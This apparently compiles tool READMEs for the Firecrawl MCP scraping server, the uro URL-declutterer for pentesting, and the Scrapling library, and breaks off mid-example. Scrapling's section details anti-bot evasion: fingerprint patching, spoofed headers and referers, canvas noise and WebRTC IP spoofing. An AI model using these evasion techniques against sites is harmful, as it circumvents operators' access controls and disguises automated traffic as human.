
Firecrawl-Mcp-Server - Official Firecrawl MCP Server - Adds Powerful Web Scraping To Cursor, Claude And Any Other LLM Clients



A Model Context Protocol (MCP) server implementation that integrates with Firecrawl for web scraping capabilities.

Big thanks to @vrknetha, @cawstudios for the initial implementation!

You can also play around with our MCP Server on MCP.so's playground. Thanks to MCP.so for hosting and @gstarwd for integrating our server.

Features

  • Scrape, crawl, search, extract, deep research and batch scrape support
  • Web scraping with JS rendering
  • URL discovery and crawling
  • Web search with content extraction
  • Automatic retries with exponential backoff
  • Efficient batch processing with built-in rate limiting
  • Credit usage monitoring for cloud API
  • Comprehensive logging system
  • Support for cloud and self-hosted Firecrawl instances
  • Mobile/Desktop viewport support
  • Smart content filtering with tag inclusion/exclusion

Installation

Running with npx

env FIRECRAWL_API_KEY=fc-YOUR_API_KEY npx -y firecrawl-mcp

Manual Installation

npm install -g firecrawl-mcp

Running on Cursor

Configuring Cursor πŸ–₯️

Note: Requires Cursor version 0.45.6+. For the most up-to-date configuration instructions, please refer to the official Cursor documentation on configuring MCP servers: Cursor MCP Server Configuration Guide

To configure Firecrawl MCP in Cursor v0.45.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add New MCP Server"
  4. Enter the following:
     β€’ Name: "firecrawl-mcp" (or your preferred name)
     β€’ Type: "command"
     β€’ Command: env FIRECRAWL_API_KEY=your-api-key npx -y firecrawl-mcp

To configure Firecrawl MCP in Cursor v0.48.6

  1. Open Cursor Settings
  2. Go to Features > MCP Servers
  3. Click "+ Add new global MCP server"
  4. Enter the following code:

{
  "mcpServers": {
    "firecrawl-mcp": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR-API-KEY"
      }
    }
  }
}

If you are using Windows and are running into issues, try cmd /c "set FIRECRAWL_API_KEY=your-api-key && npx -y firecrawl-mcp"

Replace your-api-key with your Firecrawl API key. If you don't have one yet, you can create an account and get it from https://www.firecrawl.dev/app/api-keys

After adding, refresh the MCP server list to see the new tools. The Composer Agent will automatically use Firecrawl MCP when appropriate, but you can explicitly request it by describing your web scraping needs. Access the Composer via Command+L (Mac), select "Agent" next to the submit button, and enter your query.

Running on Windsurf

Add this to your ./codeium/windsurf/model_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY"
      }
    }
  }
}

Installing via Smithery (Legacy)

To install Firecrawl for Claude Desktop automatically via Smithery:

npx -y @smithery/cli install @mendableai/mcp-server-firecrawl --client claude

Configuration

Environment Variables

Required for Cloud API

  • FIRECRAWL_API_KEY: Your Firecrawl API key
  • Required when using cloud API (default)
  • Optional when using self-hosted instance with FIRECRAWL_API_URL
  • FIRECRAWL_API_URL (Optional): Custom API endpoint for self-hosted instances
  • Example: https://firecrawl.your-domain.com
  • If not provided, the cloud API will be used (requires API key)

Optional Configuration

Retry Configuration
  • FIRECRAWL_RETRY_MAX_ATTEMPTS: Maximum number of retry attempts (default: 3)
  • FIRECRAWL_RETRY_INITIAL_DELAY: Initial delay in milliseconds before first retry (default: 1000)
  • FIRECRAWL_RETRY_MAX_DELAY: Maximum delay in milliseconds between retries (default: 10000)
  • FIRECRAWL_RETRY_BACKOFF_FACTOR: Exponential backoff multiplier (default: 2)
Credit Usage Monitoring
  • FIRECRAWL_CREDIT_WARNING_THRESHOLD: Credit usage warning threshold (default: 1000)
  • FIRECRAWL_CREDIT_CRITICAL_THRESHOLD: Credit usage critical threshold (default: 100)

Configuration Examples

For cloud API usage with custom retry and credit monitoring:

# Required for cloud API
export FIRECRAWL_API_KEY=your-api-key

# Optional retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=5 # Increase max retry attempts
export FIRECRAWL_RETRY_INITIAL_DELAY=2000 # Start with 2s delay
export FIRECRAWL_RETRY_MAX_DELAY=30000 # Maximum 30s delay
export FIRECRAWL_RETRY_BACKOFF_FACTOR=3 # More aggressive backoff

# Optional credit monitoring
export FIRECRAWL_CREDIT_WARNING_THRESHOLD=2000 # Warning at 2000 credits
export FIRECRAWL_CREDIT_CRITICAL_THRESHOLD=500 # Critical at 500 credits

For self-hosted instance:

# Required for self-hosted
export FIRECRAWL_API_URL=https://firecrawl.your-domain.com

# Optional authentication for self-hosted
export FIRECRAWL_API_KEY=your-api-key # If your instance requires auth

# Custom retry configuration
export FIRECRAWL_RETRY_MAX_ATTEMPTS=10
export FIRECRAWL_RETRY_INITIAL_DELAY=500 # Start with faster retries

Usage with Claude Desktop

Add this to your claude_desktop_config.json:

{
  "mcpServers": {
    "mcp-server-firecrawl": {
      "command": "npx",
      "args": ["-y", "firecrawl-mcp"],
      "env": {
        "FIRECRAWL_API_KEY": "YOUR_API_KEY_HERE",

        "FIRECRAWL_RETRY_MAX_ATTEMPTS": "5",
        "FIRECRAWL_RETRY_INITIAL_DELAY": "2000",
        "FIRECRAWL_RETRY_MAX_DELAY": "30000",
        "FIRECRAWL_RETRY_BACKOFF_FACTOR": "3",

        "FIRECRAWL_CREDIT_WARNING_THRESHOLD": "2000",
        "FIRECRAWL_CREDIT_CRITICAL_THRESHOLD": "500"
      }
    }
  }
}

System Configuration

The server includes several configurable parameters that can be set via environment variables. Here are the default values if not configured:

const CONFIG = {
  retry: {
    maxAttempts: 3,     // Number of retry attempts for rate-limited requests
    initialDelay: 1000, // Initial delay before first retry (in milliseconds)
    maxDelay: 10000,    // Maximum delay between retries (in milliseconds)
    backoffFactor: 2,   // Multiplier for exponential backoff
  },
  credit: {
    warningThreshold: 1000, // Warn when credit usage reaches this level
    criticalThreshold: 100, // Critical alert when credit usage reaches this level
  },
};

These configurations control:

  1. Retry Behavior
     β€’ Automatically retries failed requests due to rate limits
     β€’ Uses exponential backoff to avoid overwhelming the API
     β€’ Example: with default settings, retries will be attempted at (see the sketch after this list):
       β€’ 1st retry: 1 second delay
       β€’ 2nd retry: 2 seconds delay
       β€’ 3rd retry: 4 seconds delay (capped at maxDelay)
  2. Credit Usage Monitoring
     β€’ Tracks API credit consumption for cloud API usage
     β€’ Provides warnings at the specified thresholds
     β€’ Helps prevent unexpected service interruption
     β€’ Example: with default settings:
       β€’ Warning at 1000 credits remaining
       β€’ Critical alert at 100 credits remaining

Rate Limiting and Batch Processing

The server utilizes Firecrawl's built-in rate limiting and batch processing capabilities:

  • Automatic rate limit handling with exponential backoff
  • Efficient parallel processing for batch operations
  • Smart request queuing and throttling
  • Automatic retries for transient errors

Available Tools

1. Scrape Tool (firecrawl_scrape)

Scrape content from a single URL with advanced options.

{
  "name": "firecrawl_scrape",
  "arguments": {
    "url": "https://example.com",
    "formats": ["markdown"],
    "onlyMainContent": true,
    "waitFor": 1000,
    "timeout": 30000,
    "mobile": false,
    "includeTags": ["article", "main"],
    "excludeTags": ["nav", "footer"],
    "skipTlsVerification": false
  }
}

2. Batch Scrape Tool (firecrawl_batch_scrape)

Scrape multiple URLs efficiently with built-in rate limiting and parallel processing.

{
  "name": "firecrawl_batch_scrape",
  "arguments": {
    "urls": ["https://example1.com", "https://example2.com"],
    "options": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

Response includes operation ID for status checking:

{
  "content": [
    {
      "type": "text",
      "text": "Batch operation queued with ID: batch_1. Use firecrawl_check_batch_status to check progress."
    }
  ],
  "isError": false
}

3. Check Batch Status (firecrawl_check_batch_status)

Check the status of a batch operation.

{
  "name": "firecrawl_check_batch_status",
  "arguments": {
    "id": "batch_1"
  }
}

4. Search Tool (firecrawl_search)

Search the web and optionally extract content from search results.

{
  "name": "firecrawl_search",
  "arguments": {
    "query": "your search query",
    "limit": 5,
    "lang": "en",
    "country": "us",
    "scrapeOptions": {
      "formats": ["markdown"],
      "onlyMainContent": true
    }
  }
}

5. Crawl Tool (firecrawl_crawl)

Start an asynchronous crawl with advanced options.

{
  "name": "firecrawl_crawl",
  "arguments": {
    "url": "https://example.com",
    "maxDepth": 2,
    "limit": 100,
    "allowExternalLinks": false,
    "deduplicateSimilarURLs": true
  }
}

6. Extract Tool (firecrawl_extract)

Extract structured information from web pages using LLM capabilities. Supports both cloud AI and self-hosted LLM extraction.

{
  "name": "firecrawl_extract",
  "arguments": {
    "urls": ["https://example.com/page1", "https://example.com/page2"],
    "prompt": "Extract product information including name, price, and description",
    "systemPrompt": "You are a helpful assistant that extracts product information",
    "schema": {
      "type": "object",
      "properties": {
        "name": { "type": "string" },
        "price": { "type": "number" },
        "description": { "type": "string" }
      },
      "required": ["name", "price"]
    },
    "allowExternalLinks": false,
    "enableWebSearch": false,
    "includeSubdomains": false
  }
}

Example response:

{
  "content": [
    {
      "type": "text",
      "text": {
        "name": "Example Product",
        "price": 99.99,
        "description": "This is an example product description"
      }
    }
  ],
  "isError": false
}

Extract Tool Options:

  • urls: Array of URLs to extract information from
  • prompt: Custom prompt for the LLM extraction
  • systemPrompt: System prompt to guide the LLM
  • schema: JSON schema for structured data extraction
  • allowExternalLinks: Allow extraction from external links
  • enableWebSearch: Enable web search for additional context
  • includeSubdomains: Include subdomains in extraction

When using a self-hosted instance, the extraction will use your configured LLM. For cloud API, it uses Firecrawl's managed LLM service.

7. Deep Research Tool (firecrawl_deep_research)

Conduct deep web research on a query using intelligent crawling, search, and LLM analysis.

{
  "name": "firecrawl_deep_research",
  "arguments": {
    "query": "how does carbon capture technology work?",
    "maxDepth": 3,
    "timeLimit": 120,
    "maxUrls": 50
  }
}

Arguments:

  • query (string, required): The research question or topic to explore.
  • maxDepth (number, optional): Maximum recursive depth for crawling/search (default: 3).
  • timeLimit (number, optional): Time limit in seconds for the research session (default: 120).
  • maxUrls (number, optional): Maximum number of URLs to analyze (default: 50).

Returns:

  • Final analysis generated by an LLM based on research. (data.finalAnalysis)
  • May also include structured activities and sources used in the research process.

8. Generate LLMs.txt Tool (firecrawl_generate_llmstxt)

Generate a standardized llms.txt (and optionally llms-full.txt) file for a given domain. This file defines how large language models should interact with the site.

{
  "name": "firecrawl_generate_llmstxt",
  "arguments": {
    "url": "https://example.com",
    "maxUrls": 20,
    "showFullText": true
  }
}

Arguments:

  • url (string, required): The base URL of the website to analyze.
  • maxUrls (number, optional): Max number of URLs to include (default: 10).
  • showFullText (boolean, optional): Whether to include llms-full.txt contents in the response.

Returns:

  • Generated llms.txt file contents and optionally the llms-full.txt (data.llmstxt and/or data.llmsfulltxt)

Logging System

The server includes comprehensive logging:

  • Operation status and progress
  • Performance metrics
  • Credit usage monitoring
  • Rate limit tracking
  • Error conditions

Example log messages:

[INFO] Firecrawl MCP Server initialized successfully
[INFO] Starting scrape for URL: https://example.com
[INFO] Batch operation queued with ID: batch_1
[WARNING] Credit usage has reached warning threshold
[ERROR] Rate limit exceeded, retrying in 2s...

Error Handling

The server provides robust error handling:

  • Automatic retries for transient errors
  • Rate limit handling with backoff
  • Detailed error messages
  • Credit usage warnings
  • Network resilience

Example error response:

{
  "content": [
    {
      "type": "text",
      "text": "Error: Rate limit exceeded. Retrying in 2 seconds..."
    }
  ],
  "isError": true
}
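
Errors are reported in-band rather than thrown, so a client has to check the isError flag itself. Here is a minimal sketch of that check, assuming the response has already been parsed into a Python dict; the helper name is hypothetical, not part of the server.

# Hypothetical client-side handling; the server only defines the response shape.
def handle_tool_response(response: dict) -> str:
    text = response["content"][0]["text"]
    if response.get("isError"):
        # e.g. "Error: Rate limit exceeded. Retrying in 2 seconds..."
        raise RuntimeError(text)
    return text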

Development

# Install dependencies
npm install

# Build
npm run build

# Run tests
npm test

Contributing

  1. Fork the repository
  2. Create your feature branch
  3. Run tests: npm test
  4. Submit a pull request

License

MIT License - see LICENSE file for details




Uro - Declutters Url Lists For Crawling/Pentesting



Using a URL list for security testing can be painful as there are a lot of URLs that have uninteresting/duplicate content; uro aims to solve that.

It doesn't make any HTTP requests to the URLs and removes:

  β€’ incremental urls, e.g. /page/1/ and /page/2/
  β€’ blog posts and similar human-written content, e.g. /posts/a-brief-history-of-time
  β€’ urls with the same path but different parameter values, e.g. /page.php?id=1 and /page.php?id=2 (see the sketch after this list)
  β€’ images, js, css and other "useless" files
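
To make the parameter-value case concrete, here is a toy Python sketch of that kind of deduplication: keep one URL per unique (host, path, parameter-name set) combination. It is a rough illustration of the concept, not uro's actual implementation.

# Toy illustration of the idea, not uro's actual implementation.
from urllib.parse import urlparse, parse_qs

def dedupe(urls):
    seen = set()
    for url in urls:
        parsed = urlparse(url)
        # Two URLs with the same path and the same parameter names are duplicates.
        key = (parsed.netloc, parsed.path, tuple(sorted(parse_qs(parsed.query))))
        if key not in seen:
            seen.add(key)
            yield url

print(list(dedupe([
    "http://example.com/page.php?id=1",
    "http://example.com/page.php?id=2",  # same path + param names -> dropped
])))
# ['http://example.com/page.php?id=1']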


Installation

The recommended way to install uro is as follows:

pipx install uro

Note: If you are using an older version of python, use pip instead of pipx

Basic Usage

The quickest way to include uro in your workflow is to feed it data through stdin and print it to your terminal.

cat urls.txt | uro

Advanced usage

Reading urls from a file (-i/--input)

uro -i input.txt

Writing urls to a file (-o/--output)

If the file already exists, uro will not overwrite the contents. Otherwise, it will create a new file.

uro -i input.txt -o output.txt

Whitelist (-w/--whitelist)

uro will ignore all other extensions except the ones provided.

uro -w php asp html

Note: Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Blacklist (-b/--blacklist)

uro will ignore the given extensions.

uro -b jpg png js pdf

Note: uro has a list of "useless" extensions which it removes by default; that list is overridden by whatever extensions you provide through the blacklist option. Extensionless pages e.g. /books/1 will still be included. To remove them too, use --filter hasext.

Filters (-f/--filters)

For granular control, uro supports the following filters:

  1. hasparams: only output urls that have query parameters e.g. http://example.com/page.php?id=
  2. noparams: only output urls that have no query parameters e.g. http://example.com/page.php
  3. hasext: only output urls that have extensions e.g. http://example.com/page.php
  4. noext: only output urls that have no extensions e.g. http://example.com/page
  5. allexts: don't remove any page based on extension e.g. keep .jpg which would be removed otherwise
  6. keepcontent: keep human written content e.g. blogs.
  7. keepslash: don't remove trailing slash from urls e.g. http://example.com/page/
  8. vuln: only output urls with parameters that are known to be vulnerable.

Example: uro --filters hasext hasparams




Scrapling - An Undetectable, Powerful, Flexible, High-Performance Python Library That Makes Web Scraping Simple And Easy Again!



Dealing with failing web scrapers due to anti-bot protections or website changes? Meet Scrapling.

Scrapling is a high-performance, intelligent web scraping library for Python that automatically adapts to website changes while significantly outperforming popular alternatives. For both beginners and experts, Scrapling provides powerful features while maintaining simplicity.

>> from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher
# Fetch websites' source under the radar!
>> page = StealthyFetcher.fetch('https://example.com', headless=True, network_idle=True)
>> print(page.status)
200
>> products = page.css('.product', auto_save=True) # Scrape data that survives website design changes!
>> # Later, if the website structure changes, pass `auto_match=True`
>> products = page.css('.product', auto_match=True) # and Scrapling still finds them!

Key Features

Fetch websites as you prefer with async support

  • HTTP Requests: Fast and stealthy HTTP requests with the Fetcher class.
  • Dynamic Loading & Automation: Fetch dynamic websites with the PlayWrightFetcher class through your real browser, Scrapling's stealth mode, Playwright's Chrome browser, or NSTbrowser's browserless!
  • Anti-bot Protections Bypass: Easily bypass protections with StealthyFetcher and PlayWrightFetcher classes.

Adaptive Scraping

  • πŸ”„ Smart Element Tracking: Relocate elements after website changes, using an intelligent similarity system and integrated storage.
  • 🎯 Flexible Selection: CSS selectors, XPath selectors, filters-based search, text search, regex search and more.
  • πŸ” Find Similar Elements: Automatically locate elements similar to the element you found!
  • 🧠 Smart Content Scraping: Extract data from multiple websites without specific selectors using Scrapling powerful features.

High Performance

  • πŸš€ Lightning Fast: Built from the ground up with performance in mind, outperforming most popular Python scraping libraries.
  • πŸ”‹ Memory Efficient: Optimized data structures for minimal memory footprint.
  • ⚑ Fast JSON serialization: 10x faster than standard library.

Developer Friendly

  • πŸ› οΈ Powerful Navigation API: Easy DOM traversal in all directions.
  • 🧬 Rich Text Processing: All strings have built-in regex, cleaning methods, and more. All elements' attributes are optimized dictionaries that takes less memory than standard dictionaries with added methods.
  • πŸ“ Auto Selectors Generation: Generate robust short and full CSS/XPath selectors for any element.
  • πŸ”Œ Familiar API: Similar to Scrapy/BeautifulSoup and the same pseudo-elements used in Scrapy.
  • πŸ“˜ Type hints: Complete type/doc-strings coverage for future-proofing and best autocompletion support.

Getting Started

from scrapling.fetchers import Fetcher

fetcher = Fetcher(auto_match=False)

# Do http GET request to a web page and create an Adaptor instance
page = fetcher.get('https://quotes.toscrape.com/', stealthy_headers=True)
# Get all text content from all HTML tags in the page except `script` and `style` tags
page.get_all_text(ignore_tags=('script', 'style'))

# Get all quotes elements, any of these methods will return a list of strings directly (TextHandlers)
quotes = page.css('.quote .text::text') # CSS selector
quotes = page.xpath('//span[@class="text"]/text()') # XPath
quotes = page.css('.quote').css('.text::text') # Chained selectors
quotes = [element.text for element in page.css('.quote .text')] # Slower than bulk query above

# Get the first quote element
quote = page.css_first('.quote') # same as page.css('.quote').first or page.css('.quote')[0]

# Tired of selectors? Use find_all/find
# Get all 'div' HTML tags that one of its 'class' values is 'quote'
quotes = page.find_all('div', {'class': 'quote'})
# Same as
quotes = page.find_all('div', class_='quote')
quotes = page.find_all(['div'], class_='quote')
quotes = page.find_all(class_='quote') # and so on...

# Working with elements
quote.html_content # Get Inner HTML of this element
quote.prettify() # Prettified version of Inner HTML above
quote.attrib # Get that element's attributes
quote.path # DOM path to element (List of all ancestors from <html> tag till the element itself)

To keep it simple, all methods can be chained on top of each other!

Parsing Performance

Scrapling isn't just powerful - it's also blazing fast. Scrapling implements many best practices, design patterns, and numerous optimizations to save fractions of seconds. All of that while focusing exclusively on parsing HTML documents. Here are benchmarks comparing Scrapling to popular Python libraries in two tests.

Text Extraction Speed Test (5000 nested elements).

| # | Library | Time (ms) | vs Scrapling |
|---|-------------------|-----------|--------------|
| 1 | Scrapling | 5.44 | 1.0x |
| 2 | Parsel/Scrapy | 5.53 | 1.017x |
| 3 | Raw Lxml | 6.76 | 1.243x |
| 4 | PyQuery | 21.96 | 4.037x |
| 5 | Selectolax | 67.12 | 12.338x |
| 6 | BS4 with Lxml | 1307.03 | 240.263x |
| 7 | MechanicalSoup | 1322.64 | 243.132x |
| 8 | BS4 with html5lib | 3373.75 | 620.175x |

As you can see, Scrapling is on par with Scrapy and slightly faster than Lxml, the library both are built on top of; these are the closest results to Scrapling's. PyQuery is also built on top of Lxml, but Scrapling is still 4 times faster.

Extraction By Text Speed Test

| Library | Time (ms) | vs Scrapling |
|-------------|-----------|--------------|
| Scrapling | 2.51 | 1.0x |
| AutoScraper | 11.41 | 4.546x |

Scrapling can find elements with more methods, and it returns full element Adaptor objects, not just the text as AutoScraper does. To make this test fair, both libraries extract an element by its text, find similar elements, and then extract the text content of all of them; the sketch below reconstructs the Scrapling side of that task. As you can see, Scrapling is still 4.5 times faster at the same task.
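
For reference, the Scrapling side of that task could look roughly like this sketch, built from the find_by_text/find_similar examples later in this README; it is not the exact benchmark code (see benchmarks.py for that).

# Rough reconstruction of the task measured, not the benchmark code itself.
from scrapling.fetchers import Fetcher

page = Fetcher().get('https://books.toscrape.com/index.html')
anchor = page.find_by_text('Tipping the Velvet')            # locate one element by its text
similar = anchor.find_similar(ignore_attributes=['title'])  # find the other book links
texts = [element.text for element in similar]               # extract the text of all of them
print(len(texts))  # 19, since the anchor element itself is not included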

All benchmarks' results are an average of 100 runs. See our benchmarks.py for methodology and to run your comparisons.

Installation

Scrapling is a breeze to get started with; starting from version 0.2.9, it requires at least Python 3.9 to work.

pip3 install scrapling

Then run this command to install the browser dependencies needed to use the Fetcher classes:

scrapling install

If you have any installation issues, please open an issue.

Fetching Websites

Fetchers are interfaces built on top of other libraries with added features. They make requests or fetch pages for you in a single-request fashion and then return an Adaptor object. This feature was introduced because, previously, the only option was to fetch the page however you wanted, then pass the source manually to the Adaptor class to create an Adaptor instance and start playing around with the page. A quick before/after sketch follows.
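
Here is that contrast as a minimal sketch; the urllib fetch is just for illustration, and the Adaptor call follows the example shown later in this README.

# Before Fetchers: fetch the page yourself, then wrap it manually.
from urllib.request import urlopen
from scrapling.parser import Adaptor

source = urlopen('https://quotes.toscrape.com/').read().decode('utf-8')
page = Adaptor(source, url='https://quotes.toscrape.com/')

# With Fetchers: one call does the request and returns an Adaptor-like page.
from scrapling.fetchers import Fetcher
page = Fetcher().get('https://quotes.toscrape.com/')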

Features

You might be slightly confused by now so let me clear things up. All fetcher-type classes are imported in the same way

from scrapling.fetchers import Fetcher, StealthyFetcher, PlayWrightFetcher

All of them can take these initialization arguments: auto_match, huge_tree, keep_comments, keep_cdata, storage, and storage_args, which are the same ones you give to the Adaptor class.

If you don't want to pass arguments to the generated Adaptor object and want to use the default values, you can use this import instead for cleaner code:

from scrapling.defaults import Fetcher, AsyncFetcher, StealthyFetcher, PlayWrightFetcher

then use it right away without initializing like:

page = StealthyFetcher.fetch('https://example.com') 

Also, the Response object returned from all fetchers is the same as the Adaptor object except it has these added attributes: status, reason, cookies, headers, history, and request_headers. All cookies, headers, and request_headers are always of type dictionary.
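
For instance, those added attributes can be read straight off the returned page; a small sketch using the attributes listed above (actual values depend on the server's response):

# A quick look at the extra attributes on the Response object.
from scrapling.fetchers import Fetcher

page = Fetcher().get('https://quotes.toscrape.com/')
print(page.status)   # e.g. 200
print(page.reason)   # e.g. 'OK'
print(page.headers)  # plain dictionary of response headers
print(page.cookies)  # plain dictionary of cookies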

[!NOTE] The auto_match argument is enabled by default, and it's the one you should care about the most, as you will see later.

Fetcher

This class is built on top of httpx with additional configuration options, here you can do GET, POST, PUT, and DELETE requests.

For all methods, you have stealthy_headers, which makes Fetcher create and use real browser headers, then set a referer header as if the request came from a Google search for this URL's domain. It's enabled by default. You can also set the number of retries with the retries argument for all methods, which makes httpx retry requests that fail for any reason. The default number of retries for all Fetcher methods is 3.

Note: all headers generated by the stealthy_headers argument can be overwritten by you through the headers argument.

You can route all traffic (HTTP and HTTPS) to a proxy for any of these methods in this format: http://username:password@localhost:8030

>> page = Fetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = Fetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = Fetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = Fetcher().delete('https://httpbin.org/delete')

For Async requests, you will just replace the import like below:

>> from scrapling.fetchers import AsyncFetcher
>> page = await AsyncFetcher().get('https://httpbin.org/get', stealthy_headers=True, follow_redirects=True)
>> page = await AsyncFetcher().post('https://httpbin.org/post', data={'key': 'value'}, proxy='http://username:password@localhost:8030')
>> page = await AsyncFetcher().put('https://httpbin.org/put', data={'key': 'value'})
>> page = await AsyncFetcher().delete('https://httpbin.org/delete')

StealthyFetcher

This class is built on top of Camoufox, bypassing most anti-bot protections by default. Scrapling adds extra layers of flavors and configurations to increase performance and undetectability even further.

>> page = StealthyFetcher().fetch('https://www.browserscan.net/bot-detection')  # Running headless by default
>> page.status == 200
True
>> page = await StealthyFetcher().async_fetch('https://www.browserscan.net/bot-detection') # the async version of fetch
>> page.status == 200
True

Note: all requests done by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

For the sake of simplicity, here is the complete list of arguments:

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden mode (**default**), `virtual` to run it in virtual screen mode, or `False` for headful/visible mode. The `virtual` mode requires having `xvfb` installed. | βœ”οΈ |
| block_images | Prevent the loading of images through Firefox preferences. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests for some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | βœ”οΈ |
| extra_headers | A dictionary of extra headers to add to the request. _The referer set by the `google_search` argument takes priority over the referer set here if used together._ | βœ”οΈ |
| block_webrtc | Blocks WebRTC entirely. | βœ”οΈ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ |
| addons | List of Firefox addons to use. **Must be paths to extracted addons.** | βœ”οΈ |
| humanize | Humanize the cursor movement. Takes either `True` or the MAX duration in seconds of the cursor movement. The cursor typically takes up to 1.5 seconds to move across the window. | βœ”οΈ |
| allow_webgl | Enabled by default. Disabling WebGL is not recommended, as many WAFs now check whether WebGL is enabled. | βœ”οΈ |
| geoip | Recommended to use with proxies; automatically uses the IP's longitude, latitude, timezone, country, and locale, and spoofs the WebRTC IP address. It will also calculate and spoof the browser's language based on the distribution of language speakers in the target region. | βœ”οΈ |
| disable_ads | Disabled by default; this installs the `uBlock Origin` addon on the browser if enabled. | βœ”οΈ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ |
| timeout | The timeout in milliseconds used in all operations and waits through the page. The default is 30000. | βœ”οΈ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | βœ”οΈ |
| proxy | The proxy to be used with requests. It can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ |
| os_randomize | If enabled, Scrapling will randomize the OS fingerprints used. The default is matching the fingerprints to the current OS. | βœ”οΈ |
| wait_selector_state | The state to wait for with the selector given in `wait_selector`. _The default state is `attached`._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

PlayWrightFetcher

This class is built on top of Playwright which currently provides 4 main run options but they can be mixed as you want.

>> page = PlayWrightFetcher().fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True)  # Vanilla Playwright option
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'
>> page = await PlayWrightFetcher().async_fetch('https://www.google.com/search?q=%22Scrapling%22', disable_resources=True) # the async version of fetch
>> page.css_first("#search a::attr(href)")
'https://github.com/D4Vinci/Scrapling'

Note: all requests done by this fetcher wait by default for all JS to be fully loaded and executed, so you don't have to :)

Using this Fetcher class, you can make requests with:

  1. Vanilla Playwright, without any modifications other than the ones you chose.
  2. Stealthy Playwright, with the stealth mode I wrote for it. It's still a WIP, but it bypasses many online tests like Sannysoft's. Some of the things this fetcher's stealth mode does include:
     β€’ Patching the CDP runtime fingerprint.
     β€’ Mimicking some real browser properties by injecting several JS files and using custom options.
     β€’ Using custom flags on launch to hide Playwright even more and make it faster.
     β€’ Generating real browser headers of the same type and same user OS, then appending them to the request's headers.
  3. Real browsers, by passing the real_chrome argument or the CDP URL of your browser to be controlled by the Fetcher; most of the options can be enabled on it.
  4. NSTBrowser's docker browserless option, by passing the CDP URL and enabling the nstbrowser_mode option.

Note: using the real_chrome argument requires that you have the Chrome browser installed on your device.

Add to that a lot of controlling/hiding options, as you will see in the arguments list below.

Here is the complete list of arguments:

| Argument | Description | Optional |
|:---:|---|:---:|
| url | Target url | ❌ |
| headless | Pass `True` to run the browser in headless/hidden mode (**default**), or `False` for headful/visible mode. | βœ”οΈ |
| disable_resources | Drop requests of unnecessary resources for a speed boost. It depends, but it made requests ~25% faster in my tests for some websites. Requests dropped are of type `font`, `image`, `media`, `beacon`, `object`, `imageset`, `texttrack`, `websocket`, `csp_report`, and `stylesheet`. _This can help save your proxy usage, but be careful with this option as it makes some websites never finish loading._ | βœ”οΈ |
| useragent | Pass a useragent string to be used. **Otherwise the fetcher will generate a real Useragent of the same browser and use it.** | βœ”οΈ |
| network_idle | Wait for the page until there are no network connections for at least 500 ms. | βœ”οΈ |
| timeout | The timeout in milliseconds used in all operations and waits through the page. The default is 30000. | βœ”οΈ |
| page_action | Added for automation. A function that takes the `page` object, does the automation you need, then returns `page` again. | βœ”οΈ |
| wait_selector | Wait for a specific CSS selector to be in a specific state. | βœ”οΈ |
| wait_selector_state | The state to wait for with the selector given in `wait_selector`. _The default state is `attached`._ | βœ”οΈ |
| google_search | Enabled by default; Scrapling will set the referer header as if this request came from a Google search for this website's domain name. | βœ”οΈ |
| extra_headers | A dictionary of extra headers to add to the request. The referer set by the `google_search` argument takes priority over the referer set here if used together. | βœ”οΈ |
| proxy | The proxy to be used with requests. It can be a string or a dictionary with the keys 'server', 'username', and 'password' only. | βœ”οΈ |
| hide_canvas | Add random noise to canvas operations to prevent fingerprinting. | βœ”οΈ |
| disable_webgl | Disables WebGL and WebGL 2.0 support entirely. | βœ”οΈ |
| stealth | Enables stealth mode; always check the documentation to see what stealth mode currently does. | βœ”οΈ |
| real_chrome | If you have the Chrome browser installed on your device, enable this and the Fetcher will launch an instance of your browser and use it. | βœ”οΈ |
| locale | Set the locale for the browser if wanted. The default value is `en-US`. | βœ”οΈ |
| cdp_url | Instead of launching a new browser instance, connect to this CDP URL to control real browsers/NSTBrowser through CDP. | βœ”οΈ |
| nstbrowser_mode | Enables NSTBrowser mode; **it has to be used with the `cdp_url` argument or it will be completely ignored.** | βœ”οΈ |
| nstbrowser_config | The config you want to send with requests to NSTBrowser. _If left empty, Scrapling defaults to an optimized NSTBrowser docker browserless config._ | βœ”οΈ |

This list isn't final so expect a lot more additions and flexibility to be added in the next versions!

Advanced Parsing Features

Smart Navigation

>>> quote.tag
'div'

>>> quote.parent
<data='<div class="col-md-8"> <div class="quote...' parent='<div class="row"> <div class="col-md-8">...'>

>>> quote.parent.tag
'div'

>>> quote.children
[<data='<span class="text" itemprop="text">"The...' parent='<div class="quote" itemscope itemtype="h...'>,
<data='<span>by <small class="author" itemprop=...' parent='<div class="quote" itemscope itemtype="h...'>,
